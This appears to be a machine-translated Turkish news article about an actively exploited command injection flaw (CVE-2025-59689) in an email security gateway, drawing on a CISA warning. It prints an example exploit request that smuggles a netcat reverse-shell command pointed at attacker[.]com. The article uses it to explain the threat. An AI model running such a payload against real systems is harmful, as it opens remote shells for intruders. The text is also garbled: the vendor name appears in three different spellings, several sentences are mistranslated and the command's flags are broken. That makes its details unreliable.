
Eylül 2025’in sonlarında, Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA), CVE-2025-59689 olarak izlenen kritik bir komut enjeksiyon güvenlik açığının aktif olarak kullanılması konusunda kamuya açık bir uyarı yayınladı.
Bu kusur, sömürü kolaylığı ve Lidansva ESG’nin kurumsal ve hükümet e -posta altyapısında bir cephe savunması olarak geniş bir şekilde konuşlandırılması nedeniyle tehdit aktörleri için tercih edilen bir hedef olarak ortaya çıktı.
Güvenlik açığı, kimlik doğrulanmamış saldırganların etkilenen cihazlarda keyfi sistem komutları yürütmesine izin verir, bu da e -posta uzlaşması, veri eksfiltrasyonu ve ağlardaki yanal hareket riski ile sonuçlanır.
Bu güvenlik zayıflığının ilk keşfi, birden fazla güvenlik firması, Avrupa ve Kuzey Amerika’daki halka açık ESG cihazlarına yönelik anormal trafik gözlemledikten sonra ortaya çıktı.
Saldırganlar hızlı bir şekilde silah kavram kanıtı istismarlarını hızla silahlandırdı ve kusurun basit yük dağıtımından yararlandı-tipik olarak açık bir yönetim arayüzüne hazırlanmış bir HTTP sonrası isteği ile.
SPAM ve kimlik avı savunması için Lidanraesva ESG cihazlarına güvenen kuruluşlar doğrudan risk altındadır ve sömürü sıklıkla tam cihaz ele geçirilmesine neden olmaktadır.
CISA analistleri, CVE-2025-59689’dan yararlanan saldırganların bunu yüksek hız ve gizli ile yaptığını ve güvenlik günlüklerinde minimum izler bıraktığını belirtti.
Araştırmaları, başarılı sömürünün uzaktan kabuk erişimini, ek kötü amaçlı yazılım paketlerinin kurulumunu ve ESG cihazının iç keşif için bir pivot noktası olarak kullanılmasını sağlayan yüklere izin verdiğini ortaya koydu.
Özellikle, CISA, saldırganların kontratür sonrası kalıcı erişim kanalları oluşturmak için ters mermiler yerleştirdikleri birkaç olayı belgeledi.
CVE-2025-59689’un kalbindeki enfeksiyon mekanizması klasik bir OS komut enjeksiyonudur. Bir saldırgan, kullanıcı tarafından sağlanan parametrelere gömülü komut yükleri içeren Web tabanlı yönetim API’sına özel olarak hazırlanmış bir istek gönderir.
Örneğin:-
curl - X POST "https://target-esg/management/api[.]php" - d '[cmd]=;nc - e /bin/bash attacker[.]com 4444'
Bu komut, kusurun harici bir aktörün uzaktan bir kabuğu doğrudan saldırganın sistemine doğurmasını ve kimlik doğrulama kontrollerini atlamasını nasıl sağladığını gösterir.
CISA araştırmacıları, son güvenlik güncellemelerinden yoksun ESG cihazları nedeniyle birçok olayın meydana geldiğini ve zamanında yamalama gerekliliğinin altını çizdiğini buldu.
LiBRAESVA ESG istismar akışı, harici yük teslimi ve komuta yürütme ve saldırgan kontrolü ile sonuçlanma ile başlar.
CVE-2025-59689’un sürekli kullanımı, sağlam yama yönetiminin ve uzlaşma belirtileri için güvenlik altyapısının uyanık izlenmesinin önemini güçlendirir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.